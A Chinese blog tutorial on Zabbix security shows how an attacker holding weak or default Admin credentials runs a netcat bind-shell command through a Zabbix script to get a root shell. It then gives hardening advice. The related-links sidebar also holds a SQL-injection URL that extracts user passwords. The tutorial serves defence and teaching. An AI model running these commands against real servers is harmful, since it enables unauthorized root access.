Zabbix安全:破解弱口令后执行命令,获取shell

最新推荐文章于 2024-01-22 11:21:11 发布
最新推荐文章于 2024-01-22 11:21:11 发布
阅读量3.9k 收藏 1
点赞数
如果你的Zabbix的Admin口令太弱或者使用了默认口令(Admin/zabbix),而被黑客破解了口令的话,Zabbix服务器在黑客面前就已经毫无抵抗力了。黑客可以创建“ system.run[command,<mode>] ”监控项执行命令,甚至获取服务器shell,获取root权限。

    先介绍下system.run[command,<mode>]”,这个监控项是agent自带的,使zabbix server可以远程在agent的机器上执行任意命令。方法有二:一是建立监控项,二是通过zabbix_get命令直接远程调用。使agent启用这个监控项要在配置文件里设置EnableRemoteCommands=1。命令执行权限限制于zabbix agent的启动用户,如果你为了方便,把agent的启动用户设置为root的话(AllowRoot=1),这是非常危险的。

wKiom1T5aq-jkcptAAJ65jNc1XY524.jpg

    下面模拟一个场景,展示黑客在获取Zabbix Admin口令的情况下,如何获取服务器的shell,甚至root权限:

    这里利用NetCat(nc)命令打开shell,如果你的系统是RedHat/CentOS系列,nc可以通过yum下载到。

     选择【Administration】->【Scripts】,创建一个script,如下图:

wKioL1T5cdrC573JAALmIjFxlAw432.jpg

    “Execute on”选择Zabbix server,“Commands”里输入:

1
2
mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo

    上面的意思是打开一个shell,监听2222端口。

    进入【Dashboard】界面,在下面随便点击一个Host,会弹出一个“Scripts”选项卡,点击上面创建的“create shell”,这样上面的命令就会被执行。

wKiom1T5dADzBUAUAAKxQEV-E3M782.jpg

    到zabbix server服务器上可以看到2222号端口已经在监听了。

wKiom1T5dmzRWShWAAF-AanTyDg021.jpg

    下面我们在自己的机器上,用nc命令连接到server的shell:

wKiom1T5d_rwb1P9AAHHTfsOifc478.jpg

     上图显示我们成功获取了zabbix服务器的shell,而且是root权限!这是因为我的zabbix server是以root启动的。

    下面说一下如何对zabbix安全加固,防止这种情况发生:

    1、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令。

    2、zabbix的server和agent都不要以root启动,不要设置AllowRoot=1。

    3、禁止agent执行system.run,不要设置EnableRemoteCommands=1。

    4、经常打安全补丁,如果系统内核版本过低有漏洞的话,即使在zabbix用户下照样能获取root权限。


    参考

    sohu漏洞案例:

    http://www.wooyun.org/bugs/wooyun-2013-023089

    Netcat 命令:

    http://www.oschina.net/translate/linux-netcat-command

昨夜星辰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zabbix之system.run
Jian Sun_的博客
05-05 82
Zabbix服务器执行system.run监控项时,它会在指定的主机上执行配置的命令,并将执行结果作为监控数据返回给Zabbix服务器。的监控项,它允许用户在Zabbix服务器上执行自定义的命令或脚本,并获取执行结果作为监控数据。,并且需要在被监控主机上安装Zabbix代理程序,且Zabbix agent配置文件 必须包含。system.run监控项需要在Zabbix服务器上配置。此外,执行命令需要具有足够的权限才能成功执行Zabbix的system.run是一个。这个值 ,其余的不需要展示。
zabbix破解用户,密码
cc1988429的专栏
10-18 1913
http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20c
Zabbix用户密码忘记怎么办?
weixin_34261739的博客
07-27 354
zabbix的超级用户也是人,人就难免会忘记密码(或者清除了当前浏览器的缓存),忘记密码不要怕,因为zabbix所有的用户数据都是保存在server机器上的mysql里,只要打开zabbix_server.conf,就会查得到mysql的登录账号密码以及zabbix对应的数据库。(这里多说一句,zabbix自带的guest基本就是一个废物,forget it~)在zabbix...
Linux使用超级命令爆破自己的虚拟机用户密码
qq_52072846的博客
12-08 1019
1.使用ifconfig查看自己的虚拟机ip,以及账户 2.在超级口令检查工具中填写好目标ip地址(下面是我个人虚拟机的ip)并输入账户名把线程调整至10,在密码栏中导入自己下载好的密码本,并在左侧勾选ssh即可开始检查 3.爆破成功即可显示用户的密码 ...
ZABBIX 存在高危漏洞,尽快修补
weixin_33948416的博客
08-18 532
8月16日,由三矛科技的外部威胁情报检测模块在fulldisclosure发现8月17日,三矛科技通过微信公众号对该漏洞首次正式预警漏洞概述zabbix是一个开源的企业级性能监控解决方案。官方网站:http://www.zabbix.comzabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,***者无需授权登陆即可登陆zabbix管理系统...
zabbix密码忘记
bwlab的博客
01-20 8122
登录数据库 update users set passwd=md5(“zabbix”) where userid=’1’;
Zabbix远程执行命令的示例详解
09-29
其中,Zabbix远程执行命令功能允许管理员在触发特定事件时,自动在被监控的主机上执行预定义的命令,这对于自动化运维和问题快速响应具有重要意义。 在配置Zabbix远程执行命令之前,我们需要了解一些关键点: 1. *...
zabbix教程:zabbix从放弃到入门
04-14
zabbix教程:zabbix从放弃到入门(1):zabbix概念 zabbix教程:zabbix从放弃到入门(2):安装zabbix zabbix教程:zabbix从放弃到入门(3):在zabbix中添加主机 zabbix教程:zabbix从放弃到入门(4):在zabbix中...
ZabbixAPI:Zabbix API
05-22
ZabbixAPI是Zabbix的python实现版本#一、ZabbixAPI的用法shell#git clone https://github.com/itnihao/ZabbixAPI.gitshell#cd ZabbixAPI#安装shell#sudo python setup.py install#配置用户名、密码:#修改/etc/.zbx_...
ZabbixZabbix模板和外部脚本
02-15
Zabbix外部脚本 将脚本文件mtr.sh复制到Zabbix服务器或代理上的ExternalScripts文件夹中。 使脚本可执行:chmod + x mtr.py 将模板导入到您的Zabbix服务器。 将模板链接到目标主机。 从那里,Zabbix服务器或代理...
Zabbix注入漏洞复现
qq_43590351的博客
08-31 1444
CVE-2016-10134
【漏洞复现】Zabbix口令再到命令执行Getshell
cjstang的博客
06-29 2611
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
zabbix监控服务器交换机item参数参考
weixin_43219672的博客
11-02 2915
监控服务器 zabbix监控配置流程: 配置主机组、添加主机、添加监控项、模板、手动添加、添加触发器、定义用户媒介、配置告警方式和动作、手动触发告警 先在configuration中的hostname配置主机组,新建host,添加进hostname,在agent interfaces将IP地址改为监控服务器地址,可以在选择合适的templates,然后update Item:监控采集的项目,例如agent端的cpu、内存等,但是更加具体的来说,比如说cpu使用率,或者是cpu某个核的使用率或者是cpu的空闲
【网络安全实战】某配送平台zabbix 未授权访问 + 口令
最新发布
A1_3_9_7的博客
01-22 482
找到一个某src的子站,通过信息收集插件wappalyzer,发现ZABBIX-监控系统:使用谷歌搜索历史漏洞:zabbix漏洞通过目录扫描扫描到后台,谷歌搜索一下有没有默认口令成功进去了,挖洞就是这么简单:搜索文章还爆过未授权访问漏洞,打一波又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入不存在,这个站还可以getshell,但是点到为止。
Zabbix中使用system.run来执行Python脚本
u011197085的博客
07-05 941
Zabbix中使用system.run来执行Python脚本,你需要先在被监控主机上的Zabbix Agent配置文件中开启。编辑配置文件,将以上两个参数加入或者更改后,保存并关闭配置文件,然后重启Zabbix Agent服务以使更改生效。配置文件的位置可能因系统而异,一般来说,你可能会在。(或类似的路径)找到它。
zabbix 漏洞收集总结
sojrs_sec的博客
12-31 2651
一: 口令/默认账号 admin:zabbix Admin:zabbix guest: 空 二: sql注入(ave-2016-10134) 版本 2.2.x 3.3.0-3.03 1 http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
自强不息
05-19 1711
如果你坚持了自己的梦想,全世界都会为你让路。
zabbix3.2监控
weixin_30484739的博客
05-27 99
自动化运维框架 运维标准 流程 监控管理 容量管理、关联关系、任务管理、自动部署、分布式集群、传统集群、机器管理 安全控制 灾难管理 自动化监控 监控评估 数据采集 主动式数据采集: client、公共插件、自定义脚本 被动式服务状态: 服务状态、程序状态、用户访问质量 ...
【漏洞复现】Sentinel Dashboard默认口令漏洞
晚风不及你
01-15 1039
Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。
编写Shell程序,实现备份zabbix数据库。 用户名:zabbix 密码:zabbix
12-29
以下是一个编写Shell程序备份Zabbix数据库的示例: ```shell #!/bin/bash # 定义数据库连接信息 DB_HOST="localhost" DB_PORT="5432" DB_NAME="zabbix" DB_USER="zabbix" DB_PASSWORD="zabbix?" # 定义备份文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值